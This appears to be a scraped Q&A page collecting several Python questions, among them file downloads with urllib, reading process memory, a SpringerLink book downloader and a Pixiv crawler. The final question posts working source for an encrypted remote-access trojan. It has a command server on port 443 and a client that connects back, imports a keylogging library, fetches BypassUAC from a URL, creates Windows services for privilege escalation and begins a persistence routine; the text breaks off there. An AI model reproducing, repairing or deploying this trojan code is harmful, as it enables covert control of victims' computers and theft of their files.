download files from internet using urllib2

download files from internet using urllib2 - python

I am trying to download files from the internet for research purposes, but when I tried to move from python2 to python3. I got an error TypeError: a bytes-like object is required, not 'str' because python3 treats string different,but I had to change from .content to .text, and it fixed, but it doesn'tenter code here download the files, but it's grabbing them, how can I force to download them?
def downloadFile(self, url):
fDir=self.outputDir
local_file = None
if not os.path.isdir(fDir):
os.makedirs(fDir)
try:
f = urllib.request.urlopen(url, timeout=10)
for x in range(len(self.signature)):
if ord(f.read(1))!=self.signature[x]:
f.close()
raise
local_file=open("%s/file%08d.%s" % (fDir, self.successCount, self.extension), "wb")
for x in range(len(self.signature)):
local_file.write(chr(self.signature[x]))
local_file.write(f.read())
local_file.close()
f.close()
except KeyboardInterrupt:
raise
except:
if local_file != None:
local_file.close()
for x in range(10):
try:
if os.path.isfile("%s/file%08d.%s" % (fDir, self.successCount, self.extension)):
os.remove("%s/file%08d.%s" % (fDir, self.successCount, self.extension))
break
except:
if x==9:
raise
time.sleep(1)
return
self.successCount += 1
def search(self):
if self.extension == None or self.extension == "":
print("ERROR: No extension specified!")
return
if len(self.signature) == 0:
print("WARNING: No signature specified - THERE WILL BE LOT OF FALSE RESULTS :(")
print("Starting with search")
print("---------------------")
print("Extension: " + self.extension)
print("Signature: " + self.signatureText())
print("Starting search base: " + self.searchCharsText())
print("Output dir: " + self.outputDir)
print("Max results per search: " + str(self.maxPerSearch))
self.searchReal("")
pos=r.text.find('<a href="')
while pos != -1:
pos2_a=r.text.find('"', pos+16)
pos2_b=r.text.find('&', pos+16)
if pos2_a == -1:
pos2 = pos2_b
elif pos2_b == -1:
pos2 = pos2_a
else:
pos2 = min (pos2_a, pos2_b)
if pos2 == -1:
break;
url = r.text[pos+16:pos2]
if url.find('.google.') == -1 and url.startswith('http'):
blocked = False
if url not in self.downloaded:
self.downloadFile(url)
self.downloaded.append(url)
f.write(url + "\n")
pos_a=r.text.find('<a href="', pos+1)
pos_b=r.text.find('a href="/url?q=', pos+1)
if pos_a == -1:
pos = pos_b
elif pos_b == -1:
pos = pos_a
else:
pos=min(pos_a, pos_b)
log
http://www.aamalaysia.org/pdf/p-1_thisisaa1.pdf
https://www.deanza.edu/articulation/documents/ge-aa-as-dac.pdf
https://aamexico.org.mx/media/Lista_de_precios_%2520vigentes.pdf
https://www.aflglobal.com/productlist/Product-Lines/Conductor-Accessories/230kV-Aluminum-Welded-Bus-Pipe-Supports/doc/230kv-aluminum-welded-bus-supports.aspx

it looks like you have some extra code in there for your own purposes..but if it helps, downloading a file from the internet can be as simple as:
import urllib.request
url = 'http://www.aamalaysia.org/pdf/p-1_thisisaa1.pdf'
out_file = 'file.pdf'
data = urllib.request.urlopen(url).read()
with open(out_file,'wb') as out:
out.write(data)

Related

python - Downloading file from website using requests

I'm trying to download mp3 files from https://www.alain-pennec.bzh/editions/livre-mp3/mp3/ with the following code :
import requests
def main():
for i in range(0, 226) :
URL = "https://www.alain-pennec.bzh/editions/livre-mp3/mp3/AP"+numberOn3Char(i)+".mp3"
response = requests.get(URL)
open("AP"+numberOn3Char(i)+".mp3", "wb").write(response.content)
print(numberOn3Char(i)+" OK")
def numberOn3Char(i):
ret = str(i)
if len(ret) == 1 :
ret = '00' + ret
elif len(ret) == 2 :
ret = '0' + ret
return ret
main()
My issue is that nothing is being downloaded. I get no error and I don't understand why it's not working.

Try changing
open("AP"+numberOn3Char(i)+".mp3", "wb").write(response.content)
to
name = "AP"+numberOn3Char(i)+".mp3"
with open(name, 'wb') as f:
f.write(response.content)
and see if it works.

read/write process memory when sudo has no permission to do so

I have a short python script, which is reading memory of other process. When I am going through the maps, I can see that some pieces of the memory don't give me read/write permissions. That is true even when I run the script with sudo. Is there any way to get these permissions? I am using newest Ubuntu and code in python3. The code I use is shown below.
import re
import sys
def search(number,chunk):
for bit in chunk:
if bit == number:
print("Hit!: " + str(number))
def search16bits(number, chunk):
length = len(chunk)/8
#print("Length: " + str(length))
num = int(length/2)
#print(chunk[int(num/8)-1])
#for i in range(num):
#print(i)
for i in range(num - 1):
start = num
second = start + 1
result = chunk[second] + 256 * chunk[start]
#print(result)
if number == result:
print("Hit!: " + str(number))
exit()
def print_memory_of_pid(pid, only_writable=True):
"""
Run as root, take an integer PID and return the contents of memory to STDOUT
"""
memory_permissions = 'rw' if only_writable else 'r-'
sys.stderr.write("PID = %d" % pid)
with open("/proc/%d/maps" % pid, 'r') as maps_file:
with open("/proc/%d/mem" % pid, 'rb') as mem_file:
for line in maps_file.readlines(): # for each mapped region
m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r][-w])', line)
#print("m:" + str(m))
if m.group(3) == memory_permissions:
#sys.stderr.write("\nOK : \n" + line+"\n")
start = int(m.group(1), 16)
if start > 0xFFFFFFFFFFFF:
continue
end = int(m.group(2), 16)
sys.stderr.write( "start = " + str(start) + "\n")
mem_file.seek(start) # seek to region start
chunk = mem_file.read(end - start) # read region contents
#print()
#print()
print("###########################Next Chunk:######################################")
#search16bits(221, chunk)
#print(len(chunk))
#print(chunk) # dump contents to standard output
else:
print("No permission")
#sys.stderr.write("\nPASS : \n" + line+"\n")
if __name__ == '__main__': # Execute this code when run from the commandline.
try:
assert len(sys.argv) == 2, "Provide exactly 1 PID (process ID)"
pid = int(sys.argv[1])
print_memory_of_pid(pid)
except (AssertionError, ValueError) as e:
print("Please provide 1 PID as a commandline argument.")
print("You entered: %s" + str(sys.argv))
raise e

Pythonscript to download whole book from springerlink instead of chapters (or alternative)

springerlink has changed its structure, and now the script doesn't work anymore. With it you should could download all chapters at once instead of all single chapters.
i installed the script and its dependencies with linux.
from here http://milianw.de/code-snippets/take-2-download-script-for-springerlinkcom-ebooks and here https://github.com/milianw/springer_download
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import getopt
import urllib
import re
import tempfile
import shutil
import subprocess
# Set some kind of User-Agent so we don't get blocked by SpringerLink
class SpringerURLopener(urllib.FancyURLopener):
version = "Mozilla 5.0"
def pdfcat(fileList, bookTitlePath):
if findInPath("pdftk") != False:
command = [findInPath("pdftk")]
command.extend(fileList)
command.extend(["cat", "output", bookTitlePath])
subprocess.Popen(command, shell=False).wait()
elif findInPath("stapler") != False:
command = [findInPath("stapler"), "cat"]
command.extend(fileList)
command.append(bookTitlePath)
subprocess.Popen(command, shell=False).wait()
else:
error("You have to install pdftk (http://www.accesspdf.com/pdftk/) or stapler (http://github.com/hellerbarde/stapler).")
# validate CLI arguments and start downloading
def main(argv):
if not findInPath("iconv"):
error("You have to install iconv.")
#Test if convert is installed
if os.system("convert --version > /dev/null 2>&1")!=0:
error("You have to install the packet ImageMagick in order to use convert")
try:
opts, args = getopt.getopt(argv, "hl:c:n", ["help", "link=", "content=", "no-merge"])
except getopt.GetoptError:
error("Could not parse command line arguments.")
link = ""
hash = ""
merge = True
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-c", "--content"):
if link != "":
usage()
error("-c and -l arguments are mutually exclusive")
hash = arg
elif opt in ("-l", "--link"):
if hash != "":
usage()
error("-c and -l arguments are mutually exclusive")
match = re.match("(https?://)?(www\.)?springer(link)?.(com|de)/(content|.*book)/(?P<hash>[a-z0-9\-]+)/?(\?[^/]*)?$", arg)
if not match:
usage()
error("Bad link given. See example link.")
hash = match.group("hash")
elif opt in ("-n", "--no-merge"):
merge = False
if hash == "":
usage()
error("Either a link or a hash must be given.")
if merge and not findInPath("pdftk") and not findInPath("stapler"):
error("You have to install pdftk (http://www.accesspdf.com/pdftk/) or stapler (http://github.com/hellerbarde/stapler).")
baseLink = "http://www.springerlink.com/content/" + hash + "/"
link = baseLink + "contents/"
chapters = list()
loader = SpringerURLopener();
curDir = os.getcwd()
bookTitle = ""
coverLink = ""
front_matter = False
while True:
# download page source
try:
print "fetching book information...\n\t%s" % link
page = loader.open(link,"MUD=MP").read()
except IOError, e:
error("Bad link given (%s)" % e)
if re.search(r'403 Forbidden', page):
error("Could not access page: 403 Forbidden error.")
if bookTitle == "":
match = re.search(r'<h1[^<]+class="title">(.+?)(?:<br/>\s*<span class="subtitle">(.+?)</span>\s*)?</h1>', page, re.S)
if not match or match.group(1).strip() == "":
error("Could not evaluate book title - bad link %s" % link)
else:
bookTitle = match.group(1).strip()
# remove tags, e.g. <sub>
bookTitle = re.sub(r'<[^>]*?>', '', bookTitle)
# subtitle
if match and match.group(2) and match.group(2).strip() != "":
bookTitle += " - " + match.group(2).strip()
# edition
#match = re.search(r'<td class="labelName">Edition</td><td class="labelValue">([^<]+)</td>', page)
#if match:
#bookTitle += " " + match.group(1).strip()
## year
#match = re.search(r'<td class="labelName">Copyright</td><td class="labelValue">([^<]+)</td>', page)
#if match:
#bookTitle += " " + match.group(1).strip()
## publisher
#match = re.search(r'<td class="labelName">Publisher</td><td class="labelValue">([^<]+)</td>', page)
#if match:
#bookTitle += " - " + match.group(1).strip()
# coverimage
match = re.search(r'<div class="coverImage" title="Cover Image" style="background-image: url\(/content/([^/]+)/cover-medium\.gif\)">', page)
if match:
coverLink = "http://www.springerlink.com/content/" + match.group(1) + "/cover-large.gif"
bookTitlePath = curDir + "/%s.pdf" % sanitizeFilename(bookTitle)
if bookTitlePath == "":
error("could not transliterate book title %s" % bookTitle)
if os.path.isfile(bookTitlePath):
error("%s already downloaded" % bookTitlePath)
print "\nNow Trying to download book '%s'\n" % bookTitle
#error("foo")
# get chapters
for match in re.finditer('href="([^"]+\.pdf)"', page):
chapterLink = match.group(1)
if chapterLink[:7] == "http://": # skip external links
continue
if re.search(r'front-matter.pdf', chapterLink):
if front_matter:
continue
else:
front_matter = True
if re.search(r'back-matter.pdf', chapterLink) and re.search(r'<a href="([^"#]+)"[^>]*>Next</a>', page):
continue
#skip backmatter if it is in list as second chapter - will be there at the end of the book also
if re.search(r'back-matter.pdf', chapterLink):
if len(chapters)<2:
continue
chapters.append(chapterLink)
# get next page
match = re.search(r'<a href="([^"#]+)"[^>]*>Next</a>', page)
if match:
link = "http://www.springerlink.com" + match.group(1).replace("&", "&")
else:
break
if len(chapters) == 0:
error("No chapters found - bad link?")
print "found %d chapters" % len(chapters)
# setup; set tempDir as working directory
tempDir = tempfile.mkdtemp()
os.chdir(tempDir)
i = 1
fileList = list()
for chapterLink in chapters:
if chapterLink[0] == "/":
chapterLink = "http://www.springerlink.com" + chapterLink
else:
chapterLink = baseLink + chapterLink
chapterLink = re.sub("/[^/]+/\.\.", "", chapterLink)
print "downloading chapter %d/%d" % (i, len(chapters))
localFile, mimeType = geturl(chapterLink, "%d.pdf" % i)
if mimeType.gettype() != "application/pdf":
os.chdir(curDir)
shutil.rmtree(tempDir)
error("downloaded chapter %s has invalid mime type %s - are you allowed to download %s?" % (chapterLink, mimeType.gettype(), bookTitle))
fileList.append(localFile)
i += 1
if coverLink != "":
print "downloading front cover from %s" % coverLink
localFile, mimeType = geturl(coverLink, "frontcover")
if os.system("convert %s %s.pdf" % (localFile, localFile)) == 0:
fileList.insert(0, localFile + ".pdf")
if merge:
print "merging chapters"
if len(fileList) == 1:
shutil.move(fileList[0], bookTitlePath)
else:
pdfcat(fileList, bookTitlePath)
# cleanup
os.chdir(curDir)
shutil.rmtree(tempDir)
print "book %s was successfully downloaded, it was saved to %s" % (bookTitle, bookTitlePath)
log("downloaded %s chapters (%.2fMiB) of %s\n" % (len(chapters), os.path.getsize(bookTitlePath)/2.0**20, bookTitle))
else: #HL: if merge=False
print "book %s was successfully downloaded, unmerged chapters can be found in %s" % (bookTitle, tempDir)
log("downloaded %s chapters of %s\n" % (len(chapters), bookTitle))
sys.exit()
# give a usage message
def usage():
print """Usage:
%s [OPTIONS]
Options:
-h, --help Display this usage message
-l LINK, --link=LINK defines the link of the book you intend to download
-c ISBN, --content=ISBN builds the link from a given ISBN (see below)
-n, --no-merge Only download the chapters but don't merge them into a single PDF.
You have to set exactly one of these options.
LINK:
The link to your the detail page of the ebook of your choice on SpringerLink.
It lists book metadata and has a possibly paginated list of the chapters of the book.
It has the form:
http://www.springerlink.com/content/ISBN/STUFF
Where: ISBN is a string consisting of lower-case, latin chars and numbers.
It alone identifies the book you intent do download.
STUFF is optional and looks like #section=... or similar. It will be stripped.
""" % os.path.basename(sys.argv[0])
# raise an error and quit
def error(msg=""):
if msg != "":
log("ERR: " + msg + "\n")
print "\nERROR: %s\n" % msg
sys.exit(2)
return None
# log to file
def log(msg=""):
logFile = open('springer_download.log', 'a')
logFile.write(msg)
logFile.close()
# based on http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
def findInPath(prog):
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, prog)
if os.path.exists(exe_file) and os.access(exe_file, os.X_OK):
return exe_file
return False
# based on http://mail.python.org/pipermail/python-list/2005-April/319818.html
def _reporthook(numblocks, blocksize, filesize, url=None):
#XXX Should handle possible filesize=-1.
try:
percent = min((numblocks*blocksize*100)/filesize, 100)
except:
percent = 100
if numblocks != 0:
sys.stdout.write("\b"*70)
sys.stdout.write("%-66s%3d%%" % (url, percent))
def geturl(url, dst):
downloader = SpringerURLopener()
if sys.stdout.isatty():
response = downloader.retrieve(url, dst,
lambda nb, bs, fs, url=url: _reporthook(nb,bs,fs,url), "MUD=MP")
sys.stdout.write("\n")
else:
response = downloader.retrieve(url, dst, None, "MUD=MP")
return response
def sanitizeFilename(filename):
p1 = subprocess.Popen(["echo", filename], stdout=subprocess.PIPE)
p2 = subprocess.Popen(["iconv", "-f", "UTF-8", "-t" ,"ASCII//TRANSLIT"], stdin=p1.stdout, stdout=subprocess.PIPE)
return re.sub("\s+", "_", p2.communicate()[0].strip().replace("/", "-"))
# start program
if __name__ == "__main__":
main(sys.argv[1:])
# kate: indent-width 4; replace-tabs on;
excpected: it should downlaod the book
actual results: with command ./springer_download.py -c "978-3-662-54804-2" i get ERROR: Could not evaluate book title - bad link http://www.springerlink.com/content/978-3-662-54804-2/contents/
the test
python2 ./springer_download.py -c "978-3-662-54804-2"
does not work either
in the code above the error is in the context
match = re.search(r'<h2 class="MPReader_Profiles_SpringerLink_Content_PrimitiveHeadingControlName">([^<]+)</h2>', page)
if not match or match.group(1).strip() == "":
error("Could not evaluate book title - bad link?")
else:
bookTitle = match.group(1).strip()
print "\nThe book you are trying to download is called '%s'\n" % bookTitle
i would also be happy with alternatives like browser addons or the like. Using the example https://link.springer.com/book/10.1007/978-3-662-54805-9#toc

How to optimize the memory usage of my python crawler

I am learning python crawler these days, and I write a simple crawler to get the picture on the Pixiv by Pixiv ID.
It works quite well, but here comes a big problem: When it is running, it takes up nearly 1.2G memory on my computer.
However, sometimes it just takes up just 10M memory, I really don't know which code causes such big usage of memory.
I have uploaded the script to my VPS(Only 768M memory Vulter server) and tried to run. As a result, I get a MerroyError.
So I wonder how to optimize the memory usage(even if taking more time to run).
Here is my code:
(I have rewrote all the code to make it pass pep8, if still unclear, please tell me which code makes you confused.)
from lxml import etree
import re
import os
import requests
# Get a single Picture.
def get_single(Pixiv_ID, Tag_img_src, Headers):
Filter_Server = re.compile("[\d]+")
Filter_Posttime = re.compile("img\/[^_]*_p0")
Posttime = Filter_Posttime.findall(Tag_img_src)[0]
Server = Filter_Server.findall(Tag_img_src)[0]
Picture_Type = [".png", ".jpg", ".gif"]
for i in range(len(Picture_Type)):
Original_URL = "http://i" + str(Server) + ".pixiv.net/img-original/"\
+ Posttime+Picture_Type[i]
Picture = requests.get(Original_URL, headers=Headers, stream=True)
if Picture.status_code == 200:
break
if Picture.status_code != 200:
return -1
Filename = "./pic/"\
+ str(Pixiv_ID) + "_p0"\
+ Picture_Type[i]
Picture_File = open(Filename, "wb+")
for chunk in Picture.iter_content(None):
Picture_File.write(chunk)
Picture_File.close()
Picture.close()
return 200
# Get manga which is a bundle of pictures.
def get_manga(Pixiv_ID, Tag_a_href, Tag_img_src, Headers):
os.mkdir("./pic/" + str(Pixiv_ID))
Filter_Server = re.compile("[\d]+")
Filter_Posttime = re.compile("img\/[^_]*_p")
Manga_URL = "http://www.pixiv.net/"+Tag_a_href
Manga_HTML = requests.get(Manga_URL, headers=Headers)
Manga_XML = etree.HTML(Manga_HTML.content)
Manga_Pages = Manga_XML.xpath('/html/body'
'/nav[#class="page-menu"]'
'/div[#class="page"]'
'/span[#class="total"]/text()')[0]
Posttime = Filter_Posttime.findall(Tag_img_src)[0]
Server = Filter_Server.findall(Tag_img_src)[0]
Manga_HTML.close()
Picture_Type = [".png", ".jpg", ".gif"]
for Number in range(int(Manga_Pages)):
for i in range(len(Picture_Type)):
Original_URL = "http://i" + str(Server) + \
".pixiv.net/img-original/"\
+ Posttime + str(Number) + Picture_Type[i]
Picture = requests.get(Original_URL, headers=Headers, stream=True)
if Picture.status_code == 200:
break
if Picture.status_code != 200:
return -1
Filename = "./pic/"+str(Pixiv_ID) + "/"\
+ str(Pixiv_ID) + "_p"\
+ str(Number) + Picture_Type[i]
Picture_File = open(Filename, "wb+")
for chunk in Picture.iter_content(None):
Picture_File.write(chunk)
Picture_File.close()
Picture.close()
return 200
# Main function.
def get_pic(Pixiv_ID):
Index_URL = "http://www.pixiv.net/member_illust.php?"\
"mode=medium&illust_id="+str(Pixiv_ID)
Headers = {'referer': Index_URL}
Index_HTML = requests.get(Index_URL, headers=Headers, stream=True)
if Index_HTML.status_code != 200:
return Index_HTML.status_code
Index_XML = etree.HTML(Index_HTML.content)
Tag_a_href_List = Index_XML.xpath('/html/body'
'/div[#id="wrapper"]'
'/div[#class="newindex"]'
'/div[#class="newindex-inner"]'
'/div[#class="newindex-bg-container"]'
'/div[#class="cool-work"]'
'/div[#class="cool-work-main"]'
'/div[#class="img-container"]'
'/a/#href')
Tag_img_src_List = Index_XML.xpath('/html/body'
'/div[#id="wrapper"]'
'/div[#class="newindex"]'
'/div[#class="newindex-inner"]'
'/div[#class="newindex-bg-container"]'
'/div[#class="cool-work"]'
'/div[#class="cool-work-main"]'
'/div[#class="img-container"]'
'/a/img/#src')
if Tag_a_href_List == [] or Tag_img_src_List == []:
return 404
else:
Tag_a_href = Tag_a_href_List[0]
Tag_img_src = Tag_img_src_List[0]
Index_HTML.close()
if Tag_a_href.find("manga") != -1:
return get_manga(Pixiv_ID, Tag_a_href, Tag_img_src, Headers)
else:
return get_single(Pixiv_ID, Tag_img_src, Headers)
# Check whether the picture already exists.
def check_exist(Pixiv_ID):
if not os.path.isdir("Pic"):
os.mkdir("Pic")
if os.path.isdir("./Pic/"+str(Pixiv_ID)):
return True
Picture_Type = [".png", ".jpg", ".gif"]
Picture_Exist = False
for i in range(len(Picture_Type)):
Path = "./Pic/" + str(Pixiv_ID)\
+ "_p0" + Picture_Type[i]
if os.path.isfile(Path):
return True
return Picture_Exist
# The script starts here.
for i in range(0, 38849402):
Pixiv_ID = 38849402-i
Picture_Exist = check_exist(Pixiv_ID)
if not Picture_Exist:
Return_Code = get_pic(Pixiv_ID)
if Return_Code == 200:
print str(Pixiv_ID), "finish!"
elif Return_Code == -1:
print str(Pixiv_ID), "got an unknown error."
elif Return_Code == 404:
print str(Pixiv_ID), "not found. Maybe deleted."
else:
print str(Pixiv_ID), "picture exists!"

OMG!
Finally, I know what goes wrong.
I use mem_top() to see what takes up the memory.
Guess what?
It is for i in range(0, 38849402):
In the memory, there is a list [0, 1, 2, 3 ... 38849401], which takes up my memory.
I change it to :
Pixiv_ID = 38849402
while Pixiv_ID > 0:
some code here
Pixiv_ID = Pixiv_ID-1
Now the memory usage is just no more than 20M.
Feeling excited!

Python Script Name Not Defined

I am very new to Python. I was following a simple Python tutorial, but don't get the expected results.
After running the compiled executable on the client, the client shows up on my server. However, when I choose the client number (1), the python script is immediately exited and I get the following error when run on a remote Linux server:
Activating client: ('172.51.8.204', 18268)
Traceback (most recent call last):
File "xmulti_aeserver.py", line 207, in <module>
if nextcmd.startswith("download ") == True:
NameError: name 'nextcmd' is not defined
When run locally on a Windows server, the script does not exit, but the server disconnects the client as such:
Activating client: ('192.168.1.104', 26042)
Client disconnected... ('192.168.1.104', 26042)
I've been reading about name errors everywhere, and I can't see anything wrong with the code I'm using.
Here is my server code (xmulti_aeserver.py):
#!/usr/bin/env python
from Crypto.Cipher import AES
import socket, base64, os, time, sys, select
from Crypto import Random
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))
# generate a random secret key
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"
iv = Random.new().read(16)
# clear function
##################################
# Windows ---------------> cls
# Linux ---------------> clear
if os.name == 'posix': clf = 'clear'
if os.name == 'nt': clf = 'cls'
clear = lambda: os.system(clf)
# initialize socket
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
c.bind(('0.0.0.0', 443))
c.listen(128)
# client information
active = False
clients = []
socks = []
interval = 0.8
# Functions
###########
# send data
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
sock.sendall(EncodeAES(cipher, cmd + end))
# receive data
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
data = ""
l = sock.recv(1024)
while(l):
decrypted = DecodeAES(cipher, l)
data += decrypted
if data.endswith(end) == True:
break
else:
l = sock.recv(1024)
return data[:-len(end)]
# download file
def download(sock, remote_filename, local_filename=None):
# check if file exists
if not local_filename:
local_filename = remote_filename
try:
f = open(local_filename, 'wb')
except IOError:
print "Error opening file.\n"
Send(sock, "cd .")
return
# start transfer
Send(sock, "download "+remote_filename)
print "Downloading: " + remote_filename + " > " + local_filename
fileData = Receive(sock)
f.write(fileData)
time.sleep(interval)
f.close()
time.sleep(interval)
# upload file
def upload(sock, local_filename, remote_filename=None):
# check if file exists
if not remote_filename:
remote_filename = local_filename
try:
g = open(local_filename, 'rb')
except IOError:
print "Error opening file.\n"
Send(sock, "cd .")
return
# start transfer
Send(sock, "upload "+remote_filename)
print 'Uploading: ' + local_filename + " > " + remote_filename
while True:
fileData = g.read()
if not fileData: break
Send(sock, fileData, "")
g.close()
time.sleep(interval)
Send(sock, "")
time.sleep(interval)
# refresh clients
def refresh():
clear()
print '\nListening for clients...\n'
if len(clients) > 0:
for j in range(0,len(clients)):
print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
else:
print "...\n"
# print exit option
print "---\n"
print "[0] Exit \n"
print "\nPress Ctrl+C to interact with client."
# main loop
while True:
refresh()
# listen for clients
try:
# set timeout
c.settimeout(10)
# accept connection
try:
s,a = c.accept()
except socket.timeout:
continue
# add socket
if (s):
s.settimeout(None)
socks += [s]
clients += [str(a)]
# display clients
refresh()
# sleep
time.sleep(interval)
except KeyboardInterrupt:
# display clients
refresh()
# accept selection --- int, 0/1-128
activate = input("\nEnter option: ")
# exit
if activate == 0:
print '\nExiting...\n'
for j in range(0,len(socks)):
socks[j].close()
sys.exit()
# subtract 1 (array starts at 0)
activate -= 1
# clear screen
clear()
# create a cipher object using the random secret
cipher = AES.new(secret,AES.MODE_CFB, iv)
print '\nActivating client: ' + clients[activate] + '\n'
active = True
Send(socks[activate], 'Activate')
# interact with client
while active:
try:
# receive data from client
data = Receive(socks[activate])
# disconnect client.
except:
print '\nClient disconnected... ' + clients[activate]
# delete client
socks[activate].close()
time.sleep(0.8)
socks.remove(socks[activate])
clients.remove(clients[activate])
refresh()
active = False
break
# exit client session
if data == 'quitted':
# print message
print "Exit.\n"
# remove from arrays
socks[activate].close()
socks.remove(socks[activate])
clients.remove(clients[activate])
# sleep and refresh
time.sleep(0.8)
refresh()
active = False
break
# if data exists
elif data != '':
# get next command
sys.stdout.write(data)
nextcmd = raw_input()
# download
if nextcmd.startswith("download ") == True:
if len(nextcmd.split(' ')) > 2:
download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
else:
download(socks[activate], nextcmd.split(' ')[1])
# upload
elif nextcmd.startswith("upload ") == True:
if len(nextcmd.split(' ')) > 2:
upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
else:
upload(socks[activate], nextcmd.split(' ')[1])
# normal command
elif nextcmd != '':
Send(socks[activate], nextcmd)
elif nextcmd == '':
print 'Think before you type. ;)\n'
Here is my client code (xmulti_aeshell.py):
#!/usr/bin/python
from Crypto.Cipher import AES
import subprocess, socket, base64, time, os, sys, urllib2, pythoncom, pyHook, logging
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))
# generate a random secret key
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"
# server config
HOST = '192.168.1.104'
PORT = 443
# session controller
active = False
# Functions
###########
# send data function
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
sock.sendall(EncodeAES(cipher, cmd + end))
# receive data function
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
data = ""
l = sock.recv(1024)
while(l):
decrypted = DecodeAES(cipher, l)
data = data + decrypted
if data.endswith(end) == True:
break
else:
l = sock.recv(1024)
return data[:-len(end)]
# prompt function
def Prompt(sock, promptmsg):
Send(sock, promptmsg)
answer = Receive(sock)
return answer
# upload file
def Upload(sock, filename):
bgtr = True
# file transfer
try:
f = open(filename, 'rb')
while 1:
fileData = f.read()
if fileData == '': break
# begin sending file
Send(sock, fileData, "")
f.close()
except:
time.sleep(0.1)
# let server know we're done..
time.sleep(0.8)
Send(sock, "")
time.sleep(0.8)
return "Finished download."
# download file
def Download(sock, filename):
# file transfer
g = open(filename, 'wb')
# download file
fileData = Receive(sock)
time.sleep(0.8)
g.write(fileData)
g.close()
# let server know we're done..
return "Finished upload."
# download from url (unencrypted)
def Downhttp(sock, url):
# get filename from url
filename = url.split('/')[-1].split('#')[0].split('?')[0]
g = open(filename, 'wb')
# download file
u = urllib2.urlopen(url)
g.write(u.read())
g.close()
# let server know we're done...
return "Finished download."
# privilege escalation
def Privs(sock):
# Windows/NT Methods
if os.name == 'nt':
# get initial info
privinfo = '\nUsername: ' + Exec('echo %USERNAME%')
privinfo += Exec('systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"')
winversion = Exec('systeminfo')
windowsnew = -1
windowsold = -1
# newer versions of windows go here
windowsnew += winversion.find('Windows 7')
windowsnew += winversion.find('Windows 8')
windowsnew += winversion.find('Windows Vista')
windowsnew += winversion.find('Windows VistaT')
windowsnew += winversion.find('Windows Server 2008')
# older versions go here (only XP)
windowsold += winversion.find('Windows XP')
windowsold += winversion.find('Server 2003')
# if it is, display privs using whoami command.
if windowsnew > 0:
privinfo += Exec('whoami /priv') + '\n'
# check if user is administrator
admincheck = Exec('net localgroup administrators | find "%USERNAME%"')
# if user is in the administrator group, attempt service priv. esc. using bypassuac
if admincheck != '':
privinfo += 'Administrator privilege detected.\n\n'
# if windows version is vista or greater, bypassUAC :)
if windowsnew > 0:
# prompt for bypassuac location or url
bypassuac = Prompt(sock, privinfo+'Enter location/url for BypassUAC: ')
# attempt to download from url
if bypassuac.startswith("http") == True:
try:
c = Downhttp(sock, bypassuac)
d = os.getcwd() + '\\' + bypassuac.split('/')[-1]
except:
return "Download failed: invalid url.\n"
# attempt to open local file
else:
try:
c = open(bypassuac)
c.close()
d = bypassuac
except:
return "Invalid location for BypassUAC.\n"
# fetch executable's location
curdir = os.path.join(sys.path[0], sys.argv[0])
# add service
if windowsnew > 0: elvpri = Exec(d + ' elevate /c sc create blah binPath= "cmd.exe /c ' + curdir + '" type= own start= auto')
if windowsold > 0: elvpri = Exec('sc create blah binPath= "' + curdir + '" type= own start= auto')
# start service
if windowsnew > 0: elvpri = Exec(d + ' elevate /c sc start blah')
if windowsold > 0: elvpri = Exec('sc start blah')
# finished.
return "\nPrivilege escalation complete.\n"
# windows xp doesnt allow wmic commands by defautlt ;(
if windowsold > 0:
privinfo += 'Unable to escalate privileges.\n'
return privinfo
# attempt to search for weak permissions on applications
privinfo += 'Searching for weak permissions...\n\n'
# array for possible matches
permatch = []
permatch.append("BUILTIN\Users:(I)(F)")
permatch.append("BUILTIN\Users:(F)")
permbool = False
# stage 1 outputs to text file: p1.txt
xv = Exec('for /f "tokens=2 delims=\'=\'" %a in (\'wmic service list full^|find /i "pathname"^|find /i /v "system32"\') do #echo %a >> p1.txt')
# stage 2 outputs to text file: p2.txt
xv = Exec('for /f eol^=^"^ delims^=^" %a in (p1.txt) do cmd.exe /c icacls "%a" >> p2.txt')
# give some time to execute commands,
# 40 sec should do it... ;)
time.sleep(40)
# loop from hell to determine a match to permatch array.
ap = 0
bp = 0
dp = open('p2.txt')
lines = dp.readlines()
for line in lines:
cp = 0
while cp < len(permatch):
j = line.find(permatch[cp])
if j != -1:
# we found a misconfigured directory :)
if permbool == False:
privinfo += 'The following directories have write access:\n\n'
permbool = True
bp = ap
while True:
if len(lines[bp].split('\\')) > 2:
while bp <= ap:
privinfo += lines[bp]
bp += 1
break
else:
bp -= 1
cp += 1
ap += 1
time.sleep(4)
if permbool == True: privinfo += '\nReplace executable with Python shell.\n'
if permbool == False: privinfo += '\nNo directories with misconfigured premissions found.\n'
# close file
dp.close()
# delete stages 1 & 2
xv = Exec('del p1.txt')
xv = Exec('del p2.txt')
return privinfo
# persistence
def Persist(sock, redown=None, newdir=None):
# Windows/NT Methods
if os.name == 'nt':
privscheck = Exec('reg query "HKU\S-1-5-19" | find "error"')
# if user isn't system, return
if privscheck != '':
return "You must be authority\system to enable persistence.\n"
# otherwise procede
else:
# fetch executable's location
